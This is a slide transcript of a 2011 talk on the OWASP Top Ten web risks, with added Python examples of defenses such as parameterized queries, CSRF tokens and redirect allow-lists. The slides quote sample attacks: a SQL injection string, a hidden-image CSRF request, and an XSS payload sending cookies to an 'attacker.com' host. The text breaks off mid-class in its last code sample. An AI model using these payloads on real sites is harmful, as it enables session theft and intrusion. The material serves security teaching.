Is my Web Application secure? OWASP Top Ten Security Risks and Beyond...

An introduction to Web Application Security issues and approaches - as presented at http://www.codemotion.it 2011


  1. Hacking & OS: Is my web application secure? OWASP Top Ten Security Risks and beyond
     Carlo Bonamico, carlo.bonamico@nispro.it, NIS s.r.l. / JUG Genova
     http://www.nispro.it / http://juggenova.net
     Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  2. Is my application secure?
     - Most likely not... :-(
     - we're used to Java/.NET robustness to buffer overflow with respect to C/C++
     - but now Rich Internet Applications & AJAX bring new challenges
       - Injection, XSS, Request Forgery...
  3. We will talk about...
     - Why is (WebApp) Security complex?
       - security beyond buffer overflows
     - What about OWASP and Risk-based security approaches?
     - The OWASP Top Ten with focus on
       - Injection and Cross Site Scripting
       - Risk Mitigation approaches & tools (Spring Security, ESAPI...)
     - And beyond...
       - additional tools and techniques
     Acknowledgement: The Top Ten list and several concepts are reproduced under OWASP's CC license
  4. What is security
     - From Wikipedia: Protection of Information and Information Systems
       - from attacks, misuse, intentional and unintentional manipulation, destruction, service disruption
     - 4 guarantees
       - Integrity
       - Availability
       - Confidentiality
       - Accountability
  5. Why is security difficult?
     - Intrinsic complexity of
       - information
       - tools
       - systems
       - processes
     - "false" security perception
       - risks often difficult to estimate and measure
     - Seen only as a cost, valued only when it is missing
       - "did not happen to me"
  6. Consequences
     - Security problems often are not even detected
     - Security is added after-the-fact
       - increasing costs
       - limited effectiveness
     - Not part of
       - development processes
       - testing processes
       - standard training
  7. State of the art
     - Security technologies
       - constant improvement
     - But the main concept is Security as a process
       - includes human factors, usability issues
       - includes scale issues
     - Effective Security involves Risk Management
       - evaluate and compare risks
       - mitigate when you cannot eliminate
     - Relate security to value
  8. Web Application Security
     - Specific issues
       - complexity of network and protocols
       - power of current Browsers
       - interaction of heterogeneous sites, often under unrelated management
     - Most websites are almost open
       - (in)security through obscurity
       - social engineering attacks are easier
     - Need for specific approaches and tools
       - Need for defense in depth
  9. Recommended Books
     - Secrets & Lies: Digital Security in a Networked World, by Bruce Schneier
       - http://www.schneier.com
       - John Wiley & Sons, 2000
  10. OWASP
     - The Open Web Application Security Project is an open-source application security organization
       - includes corporations, educational organizations, and individuals
       - creates freely-available articles, methodologies, documentation & tools
       - not affiliated with any company
     - OWASP approaches application security by considering all dimensions
       - people, process, technology
       - focus on developers
       - beyond patching...
  11. OWASP Projects
     - OWASP Guides
       - Development
       - Testing
       - Verification
     - OWASP Top 10 awareness document
     - OWASP Tools
       - WebGoat
       - WebScarab penetration testing proxy
       - ESAPI
       - AntiSamy
       - ...
  12. And now... OWASP Top Ten for 2010
  13. Before we begin: OWASP recommendations...
     - Don't stop at 10
       - see OWASP Developers Guide, OWASP Testing Guide, OWASP Code Review Guide
       - constant stream of new attacks from "the future"
     - Think positive
       - stop chasing vulnerabilities
       - focus on establishing strong application security controls
       - Application Security Verification Standard (ASVS)
       - use tools wisely
     - Move towards a secure software development life-cycle (SDLC)
  14. Top Ten Security Risks for 2010
     - A1: Injection
     - A2: Cross-Site Scripting (XSS)
     - A3: Broken Authentication and Session Management
     - A4: Insecure Direct Object References
     - A5: Cross-Site Request Forgery (CSRF)
     - A6: Security Misconfiguration
     - A7: Insecure Cryptographic Storage
     - A8: Failure to Restrict URL Access
     - A9: Insufficient Transport Layer Protection
     - A10: Unvalidated Redirects and Forwards
     - What is it?
       - a list of the top 10 security Risks on the Web today
       - risks, not most common weaknesses
  15. Risk Analysis approach
     - OWASP approach based on standard methodologies
       - customized for application security
       - http://www.owasp.org/index.php/Threat_Risk_Modeling
     - Standard model
       - Risk = Likelihood * Impact
       - factors in "likelihood" and "impact" for application security
       - how to combine them
  16. How are the risks evaluated?
     - Threat Agent: application-specific
     - Attack Vector: easy, average, difficult
     - Weakness Prevalence: widespread, common, uncommon
     - Weakness Detectability: easy, average, difficult
     - Technical Impact: severe, moderate, minor
     - Business Impact: application-specific
     - worst case approach
  17. What is an attack?
     - Attacks are the techniques that agents use to exploit the vulnerabilities in applications
       - Attacks are often confused with vulnerabilities
     - http://www.owasp.org/index.php/Category:Attack
  18. What is a vulnerability?
     - A vulnerability is a hole or a weakness in the application
       - a design flaw or an implementation bug that allows an attacker to cause harm to the stakeholders of an application
     - http://www.owasp.org/index.php/Category:Vulnerability
  19. What is a control
     - Controls are defensive technologies or modules that are used to detect, deter, or deny attacks
     - Examples
       - Authentication, Authorization, Auditing
       - Session Management
       - Input Validation
       - Error Handling
       - Cryptography
     - http://www.owasp.org/index.php/Category:Control
  20. Sources of vulnerabilities
     - Missing control
       - no encryption of sensitive information
       - no access control on protected pages
     - Broken control
       - weak hash algorithm
       - fail open
     - Ignored Control
       - control present but not activated
  21. Impact Analysis
     - Technical impact
       - on the application, the data it uses, and the functions it provides
       - loss of Integrity, Availability, Confidentiality, Accountability
     - Business impact
       - on process, product, service
       - customer relationship, reputation
       - law compliance
       - out-of-business
  22. What & How to Fix
     - Fix the most severe risks first
       - it does not help to fix the easy or cheap ones if they're not significant
     - Not all risks are worth fixing
       - cost of fix vs potential damage
     - As much as possible, re-use existing, sound, tested libraries and components
       - Spring Security
         - modular, open, not just for Spring apps
       - ESAPI
         - easy to use security controls
  23. OWASP Enterprise Security API
     - A free, open source, web application security control library
       - make it easier to write lower-risk applications
       - make it easy to retrofit security into existing code
     - Language-specific versions
       - JAVA, .NET, PHP, Ruby...
     - Standard controls + extensible interfaces
       - ESAPI.encoder(), ESAPI.validator()
       - ESAPI.encryptor()
       - ESAPI.authenticator(), ESAPI.accessController()
       - ESAPI.httpUtilities()
  24. ESAPI References
     - Introduction to ESAPI
       - http://www.slideshare.net/denimgroup/enterprise-security-api-esapi-java-java-user-group-san-antonio
       - http://www.owasp.org/images/c/c7/ESAPI-2010-AppSecDC.pptx
     - ESAPI mapped to the Top Ten
       - http://www.jtmelton.com/2009/01/03/the-owasp-top-ten-and-esapi/
     - Samples
       - http://code.google.com/p/owasp-esapi-java-swingset
  25. A1 Injection
     - Threat Agents: internal or external actor who can feed untrusted data
     - Attack Vectors: Exploitability AVERAGE
     - Security Weakness: Prevalence COMMON / Detectability AVERAGE
     - Technical Impacts: SEVERE
     - Business Impacts
  26. How it works
     - Attacker sends some special text that is executed by the target interpreter
       - any source of data is at risk: form fields, uploads, url parameters
     - Wide range of cases, according to the interpreter
       - SQL executor, LDAP, XPath, OS commands, URL arguments
     - easy to discover when examining code
       - more difficult via testing
     - can result in
       - data loss or corruption, lack of accountability, or denial of access, sometimes complete host takeover
  27. Example Scenario: SQL Injection
     - Quick and dirty JDBC code
       - String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
     - The attacker sends an id parameter
       - http://example.com/app/accountView?id=' or '1'='1
       - View other accounts
     - In the worst case, the attacker uses this weakness to invoke
       - special stored procedures or DDL queries
       - allowing a complete db manipulation
  28. Preventing SQL Injection
     - Never create Statements with string manipulation
     - Always use PreparedStatement or CallableStatement
       - or a framework based on them (e.g. iBatis / myBatis, Spring JdbcTemplate)
     - With Hibernate/JPA, HQL Injection is still possible
       - always use "by-name" parameters
       - from EntityName where id=:id
     - Defense in depth
       - minimal privileges on the DB connection
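The scenario on slides 27 and 28 end to end, as an added example that is not code from the talk (the talk's snippet is Java/JDBC): an in-memory sqlite3 table stands in for the accounts table, `account_view_vulnerable` reproduces the concatenated query and `account_view_safe` is the bound-parameter (PreparedStatement) equivalent. The table contents and the `demo` helper are constructed here.

```python
import sqlite3

# Constructed in-memory stand-in for the slide's "accounts" table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [("1001", "alice", 500), ("1002", "bob", 1200), ("1003", "carol", 75)])
    return conn

def account_view_vulnerable(conn, cust_id):
    # Mirrors the slide's string-built JDBC query: the request parameter becomes part of
    # the SQL text, so the interpreter executes whatever the caller put in it.
    query = "SELECT custID, owner FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()

def account_view_safe(conn, cust_id):
    # Parameter binding (the PreparedStatement equivalent): the value travels out of band
    # and is compared as data, never parsed as SQL.
    query = "SELECT custID, owner FROM accounts WHERE custID=?"
    return conn.execute(query, (cust_id,)).fetchall()

def demo():
    """Run both variants with a normal id and with the id value from the slide."""
    conn = make_db()
    payload = "' or '1'='1"
    return {
        "normal_vuln": account_view_vulnerable(conn, "1002"),
        "payload_vuln": account_view_vulnerable(conn, payload),   # every account leaks
        "normal_safe": account_view_safe(conn, "1002"),
        "payload_safe": account_view_safe(conn, payload),         # no row has that literal id
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```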
  29. Hibernate & JPA
     - Uses PreparedStatements and SQL validation
     - Vulnerable to HQL injection
       - prefer named parameters
       - use Criteria queries when programmatically constructing them
     - See also
       - http://www.owasp.org/index.php/Hibernate
       - http://www.owasp.org/index.php/Hibernate-Guidelines
  30. Other platforms
     - .NET
       - use parameterized APIs with parameter binding
       - SqlCommand(), OleDbCommand()
     - PHP
       - use PDO
       - with strongly typed bindParam()
  31. Injection references
     - OWASP
       - http://www.owasp.org/index.php/Top_10_2010-A1
       - http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
     - Advanced Topics
       - http://www.hdm-stuttgart.de/~ms096/SQLInjectionWhitePaper.pdf
       - http://www.nextgenss.com/papers/advanced_sql_injection.pdf
       - http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
  32. A2 XSS
     - Threat Agents: internal or external actor who can feed untrusted data
     - Attack Vectors: Exploitability AVERAGE
     - Security Weakness: Prevalence VERY WIDESPREAD / Detectability EASY
     - Technical Impacts: MODERATE
     - Business Impacts
  33. How it works
     - Attacker sends special text that sooner or later is delivered to another web browser
       - and executed... typically as JavaScript
       - almost any source of data can be an attack vector
     - XSS is the most prevalent web application security flaw
       - as an example, JSP EL Expressions like ${...} are immediately evaluated and printed to the page "as is", thus propagating XSS
     - And comes in three flavors
       - 1) Stored, 2) Reflected, 3) DOM based
  34. Example Scenarios
     - The application dynamically generates an input field without validation or escaping
       - out.println("<input name='creditcard' value='" + request.getParameter("CC") + "'>");
     - The attacker modifies the 'CC' parameter in their browser to
       - '><script>document.location='http://www.attacker.com/saveCookie?id='+document.cookie</script>
     - The victim's session ID is sent to the attacker
       - ready for hijacking
  35. XSS Prevention
     - Untrusted Data of any kind, from any source
       - HTTP request, URL parameters, form fields, headers, cookies
       - databases, web services, uploaded files...
     - should always be treated as though it contains an attack
       - since browsers are the worst mix of code and data
       - many different parsers (XML, HTML, JavaScript, VBScript, CSS, URL, etc...)
     - sanitized → encoded BEFORE being displayed or forwarded
       - escaping never harms
  36. OWASP Positive XSS Prevention Model
     - An HTML page is like a template with slots where a developer is allowed to put untrusted data
       - untrusted data is not allowed elsewhere
       - "whitelist" model
       - similar to Firefox 4 Content Security Policy
     - Each of the different types of slots has slightly different security rules
       - attributes, body, urls, links, ...
  37. ESAPI for Encoding
     - Context-dependent encoding
       - encodeForSQL
       - encodeForJavaScript
       - encodeForXML
       - encodeForVBScript
       - encodeForXMLAttribute
       - encodeForURL
       - encodeForXPath
       - encodeForDN
       - encodeForHTML
       - encodeForHTMLAttribute
       - encodeForLDAP
     - canonicalize method to remove encodings
     - <%=ESAPI.encoder().encodeForHTML(name)%>
  38. References
     - Consider employing Mozilla's new Content Security Policy
       - coming out in Firefox 4
     - Cheat Sheets
       - http://ha.ckers.org/xss.html
       - http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  39. A3 Broken Authentication and Session Management
     - Threat Agents: legitimate users, external, insider
     - Attack Vectors: Exploitability AVERAGE
     - Security Weakness: Prevalence COMMON / Detectability AVERAGE
     - Technical Impacts: SEVERE
     - Business Impacts
  40. Weaknesses
     - Developers frequently build custom authentication and session management schemes
       - but building these correctly is hard
     - Defects in areas such as
       - logout, password management, timeouts, remember me, secret question, account update, etc.
     - Admin/special accounts are mostly targeted
  41. Example Scenario
     - A) Website uses URL rewriting, leaving session ID in clear
       - http://travel.com/bookFlight;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Australia
       - link is shared in an email
       - sessionID goes around unencrypted
     - B) Exceptions during login validation are not properly handled
       - alter the execution path
       - causing an unauthorized access
  42. Things to be checked
     - Are credentials always protected when stored
       - using hashing or encryption?
     - Can credentials be guessed or altered during account management
       - account creation, change password, recover password?
     - Are session IDs
       - exposed in the URL (e.g., URL rewriting)?
       - vulnerable to session fixation?
       - rotated after successful login?
     - Are passwords, session IDs, and credentials sent only over TLS?
  43. Solid Authentication and Session Management
     - Use a single set of strong authentication and session management controls
       - e.g. Spring Security and/or ESAPI Authenticator
     - Be sure to avoid XSS flaws
       - can be used to steal session IDs
     - Prevent brute force attacks
       - limit number of attempts
  44. A4 Insecure Direct Object References
     - Threat Agents: authorized users with partial access to data
     - Attack Vectors: Exploitability EASY
     - Security Weakness: Prevalence COMMON / Detectability EASY
     - Technical Impacts: MODERATE
     - Business Impacts
  45. How it works
     - Attacker changes a parameter value
       - to point to another entity for which he has no access rights
     - Applications often use a business key
       - easy to guess
     - Applications often do not check access to a URL after the user requests it
       - (false) security through obscurity
  46. Example
     - Retrieve account data without verifications
       - query = "SELECT * FROM accts WHERE code=?";
       - PreparedStatement pstmt = connection.prepareStatement(query, ...);
       - pstmt.setString(1, request.getParameter("code"));
       - ResultSet results = pstmt.executeQuery();
     - The attacker modifies the 'code' parameter
       - http://example.com/app/accountInfo?acct=notmyacct
  47. How Do I Prevent Insecure Direct Object References?
     - Use per user or session indirect object references
       - instead of the resource's database key
       - possibly generated through ESAPI
       - RandomAccessReferenceMap instance = new RandomAccessReferenceMap();
       - String indirectKey = instance.addDirectReference((Object) entity);
     - Check access
       - proper authorization
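The two controls from slide 47 together, as an added example: a per-session indirect reference map in the spirit of the ESAPI class the slide names (a simplified re-implementation here, not ESAPI's code) plus the explicit authorization check that must still be made when the reference is resolved. The account table, user names and helper functions are constructed for this example.

```python
import secrets

class AccessControlError(Exception):
    pass

class RandomAccessReferenceMap:
    """Per-session map between direct references (database keys) and random indirect keys."""
    def __init__(self, key_bytes=6):
        self._key_bytes = key_bytes
        self._i2d = {}   # indirect -> direct
        self._d2i = {}   # direct -> indirect

    def add_direct_reference(self, direct):
        # Idempotent: the same object always gets the same indirect key within this session.
        if direct in self._d2i:
            return self._d2i[direct]
        while True:
            indirect = secrets.token_hex(self._key_bytes)   # unguessable, unlike a business key
            if indirect not in self._i2d:
                break
        self._i2d[indirect] = direct
        self._d2i[direct] = indirect
        return indirect

    def get_direct_reference(self, indirect):
        try:
            return self._i2d[indirect]
        except KeyError:
            # Direct keys, other users' indirect keys and guesses all end up here.
            raise AccessControlError("unknown object reference %r" % indirect)

# Constructed sample data: account code -> owning user.
ACCOUNTS = {"A-100": "alice", "A-101": "alice", "A-200": "bob"}

def build_session_map(user):
    """At login, expose only the user's own accounts; returns (map, indirect keys for links)."""
    refmap = RandomAccessReferenceMap()
    links = [refmap.add_direct_reference(code) for code, owner in ACCOUNTS.items() if owner == user]
    return refmap, links

def account_info(user, refmap, acct_param):
    """The accountInfo handler: resolve the parameter, then still enforce authorization.
    The map is a convenience that removes guessable keys; the check is the control."""
    code = refmap.get_direct_reference(acct_param)
    if ACCOUNTS.get(code) != user:
        raise AccessControlError("user %s may not read %s" % (user, code))
    return code

def is_denied(user, refmap, acct_param):
    try:
        account_info(user, refmap, acct_param)
        return False
    except AccessControlError:
        return True

if __name__ == "__main__":
    refmap, links = build_session_map("alice")
    print("alice's links:", links)
    print("own key resolves to:", account_info("alice", refmap, links[0]))
    print("direct key 'A-200' denied:", is_denied("alice", refmap, "A-200"))
    print("guess 'notmyacct' denied:", is_denied("alice", refmap, "notmyacct"))
```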
  48. A5 Cross-Site Request Forgery (CSRF)
     - Threat Agents: anyone who can trick your users into submitting a request to your website
     - Attack Vectors: Exploitability AVERAGE
     - Security Weakness: Prevalence WIDESPREAD / Detectability EASY
     - Technical Impacts: MODERATE
     - Business Impacts
  49. How it works
     - Any email or RSS feed or ad creates forged HTTP requests and tricks a victim into submitting them
       - via image tags, XSS, or numerous other techniques
       - if the user is logged in, the attack succeeds
     - Easy when request details are guessable
       - the browser automatically sends cookies to the target server
       - making it difficult to distinguish good requests from bad ones
  50. Example
     - The application allows a user to submit a state changing request that does not include anything secret. Like so:
       - http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
     - Attacker hides the link in an img
       - <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
     - If the victim browser recently visited and logged into example.com, forged requests will include the user's session info
       - inadvertently authorizing the action
  51. How Do I Prevent CSRF?
     - Include an unpredictable token in each HTTP request
       - e.g. hidden field, not included in the URL
       - session cookies, source IP addresses, and other information that is automatically sent doesn't count, since this information is also included in forged requests
     - OWASP's CSRF Guard
       - automatically include such tokens in your Java EE, .NET, or PHP application
       - ESAPI also includes token generators and validators
     - Also check the HDIV framework
       - http://www.hdiv.org/
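The token defense of slide 51 applied to the transferFunds request of slide 50, as an added example in the spirit of CSRFGuard / ESAPI's token helpers (a simplified re-implementation, not their code): the token is bound to the session, delivered in a hidden field, and checked with a constant-time comparison. Request dicts, session ids and the `CsrfGuard` class are constructed here.

```python
import hmac
import secrets

class CsrfGuard:
    """Synchronizer token per session: generated once, sent in a hidden form field,
    required on every state-changing request."""
    def __init__(self):
        self._tokens = {}   # session_id -> token

    def token_for(self, session_id):
        if session_id not in self._tokens:
            self._tokens[session_id] = secrets.token_urlsafe(32)   # 256 bits, unguessable
        return self._tokens[session_id]

    def hidden_field(self, session_id):
        # Goes into the form body, never into the URL (URLs leak via Referer, logs, history).
        return '<input type="hidden" name="csrf_token" value="%s">' % self.token_for(session_id)

    def is_valid(self, session_id, submitted):
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        # Constant-time comparison: a plain == would let response timing leak the token.
        return hmac.compare_digest(expected.encode(), submitted.encode())

def transfer_funds(guard, request):
    """State-changing handler. `request` is a constructed dict: the session id the browser
    sent automatically in its cookie, and the submitted form fields."""
    session_id = request["cookies"].get("JSESSIONID")
    if session_id is None:
        return 401, "not logged in"
    if not guard.is_valid(session_id, request["form"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    form = request["form"]
    return 200, "transferred %s to %s" % (form["amount"], form["destinationAccount"])

def demo():
    """Legitimate form post, the slide's forged <img> request, and a forged request
    carrying a token from the attacker's own session. Returns the three status codes."""
    guard = CsrfGuard()
    legit = {"cookies": {"JSESSIONID": "sess-victim"},
             "form": {"amount": "1500", "destinationAccount": "4673243243",
                      "csrf_token": guard.token_for("sess-victim")}}
    # The browser attaches the victim's cookie to the <img> request automatically,
    # but the page hosting the <img> cannot read the victim's token to include it.
    forged = {"cookies": {"JSESSIONID": "sess-victim"},
              "form": {"amount": "1500", "destinationAccount": "attackersAcct"}}
    wrong_session = {"cookies": {"JSESSIONID": "sess-victim"},
                     "form": {"amount": "1500", "destinationAccount": "attackersAcct",
                              "csrf_token": guard.token_for("sess-attacker")}}
    return (transfer_funds(guard, legit)[0],
            transfer_funds(guard, forged)[0],
            transfer_funds(guard, wrong_session)[0])

if __name__ == "__main__":
    print(demo())
```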
  52. References
     - OWASP Cheat Sheet
       - http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
  53. A6 Security Misconfiguration
     - Threat Agents: anonymous & internal users wanting more access or to hide their actions
     - Attack Vectors: Exploitability EASY
     - Security Weakness: Prevalence COMMON / Detectability EASY
     - Technical Impacts: MODERATE
     - Business Impacts
  54. How it works
     - Attacker accesses
       - default accounts
       - unused pages
       - unpatched flaws
       - unprotected files and directories
     - Security misconfiguration can happen at any level of an application stack
       - including the platform, web server, application server, framework, and custom code
     - Automated scanners are useful
  55. Administrative Interfaces
     - Are a critical entry point
       - to application servers, virtualization environments and operating systems
     - Enable them on separate channels
     - Ensure default access credentials are changed
  56. How Do I Prevent Security Misconfiguration?
     - Use a repeatable hardening process that makes it fast and easy to deploy secured platforms
       - disabling unnecessary components and services
       - enabling authentication
       - changing default credentials
       - see also devops
     - Setup a process for security updates and patches
     - Use minimal privileges everywhere
     - Perform scans and audits
  57. Configuration data
     - review configuration for unsafe defaults
       - frameworks
       - application server
       - web server
       - db
       - operating system
       - virtual machine
     - create a company-wide knowledge base of secure configs and hardening how-tos
       - integrate with open ones, including OWASP's
  58. A7 Insecure Cryptographic Storage
     - Threat Agents: internal/external users wanting access escalation
     - Attack Vectors: Exploitability DIFFICULT
     - Security Weakness: Prevalence UNCOMMON / Detectability DIFFICULT
     - Technical Impacts: SEVERE
     - Business Impacts
  59. How it works
     - Attackers typically don't break the crypto
       - They break something else
       - e.g. use a keylogger
       - or access data via channels that automatically decrypt
     - The most common defect is simply not encrypting sensitive data
     - If using crypto, beware of
       - unsafe key generation and storage
       - weak algorithms
  60. How Do I Prevent Insecure Cryptographic Storage?
     - App-specific, but at least:
       - make sure you encrypt all sensitive data
       - ensure offsite backups are encrypted, but keys managed separately
       - use strong standard algorithms and strong keys
     - avoid Do It Yourself
       - proper key management approaches
       - encrypted = ESAPI.encryptor().encrypt(decrypted);
       - decrypted = ESAPI.encryptor().decrypt(encrypted);
     - Ensure passwords are hashed and salted
     - Ensure all keys and passwords are protected
  61. A8 Failure to Restrict URL Access
     - Threat Agents: users wanting to access a private page or privileged page
     - Attack Vectors: Exploitability EASY
     - Security Weakness: Prevalence UNCOMMON / Detectability AVERAGE
     - Technical Impacts: MODERATE
     - Business Impacts
  62. How it works
     - Attacker, who is an authorized system user, simply changes the URL to a privileged page
     - Checks are not present
       - or Checks are present but not configured correctly
       - or Links to sensitive pages are hidden, but if the direct URL is used they are not protected
  63. How Do I Prevent Failure to Restrict URL Access?
     - Prefer role-based policies
       - to minimize the effort required to maintain them
     - The policies should be highly and easily configurable
       - to minimize hard coded aspects
     - The enforcement mechanism should deny all by default
       - requiring explicit grants
     - In workflow interactions
       - check all states
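The four points of slide 63 as one enforcement function, added here as an example (not code from the talk or from Spring Security/ESAPI): a configurable role-based URL policy evaluated after path normalization, deny-all when no rule grants access, and a workflow check that refuses entry to a step whose predecessors were not completed. The policy table, roles and workflow steps are constructed for this example.

```python
import posixpath
import re

# Constructed role-based policy: each entry grants a URL pattern to the listed roles.
# Anything no entry matches is denied (deny-all default, explicit grants only).
POLICY = [
    (r"^/public(/.*)?$",  {"ANONYMOUS", "USER", "ADMIN"}),
    (r"^/account(/.*)?$", {"USER", "ADMIN"}),
    (r"^/admin(/.*)?$",   {"ADMIN"}),
]
_COMPILED = [(re.compile(p), roles) for p, roles in POLICY]

def normalize(raw_path):
    """Reduce the request path to the form the container will actually serve:
    drop the query string and path parameters (";jsessionid=..."), resolve "." and "..",
    collapse duplicate slashes. Matching the raw string instead is how "/account/../admin"
    slips past a policy."""
    path = raw_path.split("?", 1)[0].split(";", 1)[0]
    return posixpath.normpath("/" + path.lstrip("/"))

def is_authorized(role, raw_path):
    path = normalize(raw_path)
    for pattern, roles in _COMPILED:
        if pattern.match(path):
            return role in roles        # first matching rule decides
    return False                        # no rule matched: deny by default

# Workflow: steps must be entered in order; a session records which steps it completed.
WORKFLOW = ["cart", "address", "payment", "confirm"]

def may_enter(step, completed):
    """True only if every earlier step of the workflow has been completed in this session,
    so jumping straight to the "confirm" URL is refused."""
    if step not in WORKFLOW:
        return False
    return all(s in completed for s in WORKFLOW[:WORKFLOW.index(step)])

if __name__ == "__main__":
    for role, path in [("USER", "/admin/users"), ("ADMIN", "/admin/users"),
                       ("USER", "/account/../admin/users"), ("USER", "/reports/hidden.jsp")]:
        print(role, path, "->", "allow" if is_authorized(role, path) else "deny")
    print("confirm without payment ->", may_enter("confirm", {"cart", "address"}))
```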
  64. A9 Insufficient Transport Layer Protection
     - Threat Agents: anyone who can monitor the traffic of your users or backend connections
     - Attack Vectors: Exploitability DIFFICULT
     - Security Weakness: Prevalence COMMON / Detectability EASY
     - Technical Impacts: MODERATE
     - Business Impacts
  65. How it works
     - Monitoring network traffic can be difficult
       - but is sometimes easy
       - see wireshark...
     - Applications often use SSL/TLS only during authentication
       - exposing data and session IDs to interception
     - or only on the front-end
       - leaving back-end connections to DB or JMS Servers vulnerable
     - Systems use old versions of SSL protocols
       - subject to many flaws
  66. How Do I Prevent Insufficient Transport Layer Protection?
     - Require SSL for all sensitive pages
       - redirect unsecured requests to the SSL page
     - Set the 'secure' flag on all sensitive cookies
     - Only support strong (e.g., FIPS 140-2 compliant) algorithms
       - at least TLS 1.0 / SSL 3.0
     - Ensure your certificate is valid, not expired, not revoked
       - and matches all domains used by the site
     - Backend and other connections should also use SSL
  67. A10 Unvalidated Redirects and Forwards
     - Threat Agents: anyone who can trick your users into submitting a request to your website
     - Attack Vectors: Exploitability EASY
     - Security Weakness: Prevalence UNCOMMON / Detectability EASY
     - Technical Impacts: MODERATE
     - Business Impacts
  68. How it works
     - Attacker links to an unvalidated redirect and tricks victims into clicking it
       - http://good.com/fwd?redir=bad.com/virus.exe
       - properly %-encoded...
     - Victims are more likely to click on it, since the link is to a valid site
     - User manipulates a parameter to forward to a protected page
       - http://good.com/forward?path=/WEB-INF/admin.jsp
     - Happens when the redirect/forward url comes from a request parameter
  69. How Do I Prevent Unvalidated Redirects and Forwards?
     - Simply avoid using redirects and forwards
       - if used, don't involve parameters in calculating the destination
       - else, check the destination against a valid list (ESAPI supports this)
       - and verify page authorizations
     - Better yet, use a parameter which is a key and not a full URL
       - http://good.com/fwd?path=1
     - Use
       - HTTPUtilities.sendSafeRedirect()
       - HTTPUtilities.safeEncodeRedirectURL()
       - HTTPUtilities.sendSafeForward()
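The three options of slide 69 as an added example (this is not ESAPI's HTTPUtilities code): the key-based table for "?path=1", an allow-list check for the case where a full redirect URL must still be accepted, and a forward check that keeps container-private paths such as /WEB-INF out of reach. The host list, redirect table and function names are this example's own.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"good.com", "www.good.com"}

# Key-based redirects (slide 69): the request parameter selects an entry, it is not a URL.
REDIRECT_TABLE = {"1": "/home", "2": "/account/summary", "3": "https://www.good.com/help"}

def safe_redirect_target(path_key):
    # An unknown key gets the default page, never an attacker-chosen destination.
    return REDIRECT_TABLE.get(path_key, "/")

def is_allowed_redirect(url):
    """Allow-list check for a full redirect URL. Parse it properly: substring tests such as
    'good.com' in url pass http://good.com.evil.com/ and http://good.com@evil.com/."""
    parts = urlsplit(url)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False                                 # javascript:, data:, ...
    if parts.netloc:
        return (parts.hostname or "").lower() in ALLOWED_HOSTS   # absolute URL: our host only
    # Relative URL: must be site-absolute; "//evil.com" would be protocol-relative and
    # "bad.com/virus.exe" (the slide's value) is not a path on this site.
    return url.startswith("/") and not url.startswith("//") and not url.startswith("/\\")

def is_allowed_forward(path):
    """Server-side forward target: an absolute servlet path, no traversal, and never
    into WEB-INF or META-INF (the slide's /WEB-INF/admin.jsp case)."""
    norm = path.replace("\\", "/")
    while "//" in norm:
        norm = norm.replace("//", "/")
    if not norm.startswith("/") or ".." in norm.split("/"):
        return False
    upper = norm.upper()
    return not (upper.startswith("/WEB-INF") or upper.startswith("/META-INF"))

if __name__ == "__main__":
    for u in ["bad.com/virus.exe", "http://bad.com/virus.exe", "//bad.com/x",
              "http://good.com.evil.com/", "javascript:alert(1)", "/account/summary"]:
        print(u, "->", is_allowed_redirect(u))
    print("/WEB-INF/admin.jsp ->", is_allowed_forward("/WEB-INF/admin.jsp"))
    print("path=1 ->", safe_redirect_target("1"))
```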
  70. More... Additional Principles and Tools
  71. Organizational commitment to security
     - Costs are not the main issue
       - most of the effort for secure applications also leads to better/more robust/more productive applications
     - Focus and culture are
       - what's your priority?
     - Commercial aspects
       - would you sell a wonderful car with no keys?
     - Mostly
       - training, team effort, specialistic support
  72. ESAPI Web Application Firewall (WAF)
     - Can be called separately from the other controls
     - Can add to an existing application
       - Virtual patches
       - Enforce authentication
       - Enforce access control
       - add input validations
       - add output encodings
       - Enforce HTTPS
       - sanitize HTTP headers and cookies
  73. Pros and Cons
     - Easier and faster to apply patches without coding
     - no substitute for proper design and implementation
       - a mitigation solution
     - See also
       - http://www.slideshare.net/llamakong/owasp-esapi-waf-appsec-dc-2009
  74. Application Layer Logging/Intrusion Detection
     - Really important!
       - one of the most important security mechanisms
       - normally not done
     - ESAPI Intrusion detection
     - Key features
       - Log Intrusion
       - Logout User
       - Disable Account
       - Configurable Thresholds
  75. AppSensor
     - you report significant events by means of exceptions
       - invalid credentials
       - validation exceptions
     - AppSensor
       - collects them
       - presents them in a management console
       - produces alerts according to configurable thresholds
       - can take actions
         - lock accounts, disable IP clients
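The event-and-threshold mechanism of slides 74 and 75 as an added example in the spirit of ESAPI's intrusion detector and AppSensor (a constructed re-implementation, not their code or their configuration format): the application reports events such as invalid credentials, each threshold counts one event type per user or per client IP in a sliding window, and reaching it triggers the configured actions (log, logout, lock account, block IP). The threshold values, user and IP are constructed here.

```python
import time
from collections import defaultdict, deque

# Constructed threshold configuration: per event type, rules of the form
# "count events per subject within window seconds, then take these actions".
THRESHOLDS = {
    "InvalidCredentials": [
        {"subject": "user", "count": 5, "window": 60, "actions": ["log"]},
        {"subject": "user", "count": 10, "window": 300, "actions": ["log", "logout", "lock_account"]},
        {"subject": "ip", "count": 30, "window": 300, "actions": ["log", "block_ip"]},
    ],
    "ValidationException": [
        {"subject": "ip", "count": 3, "window": 60, "actions": ["log", "block_ip"]},
    ],
}

class IntrusionDetector:
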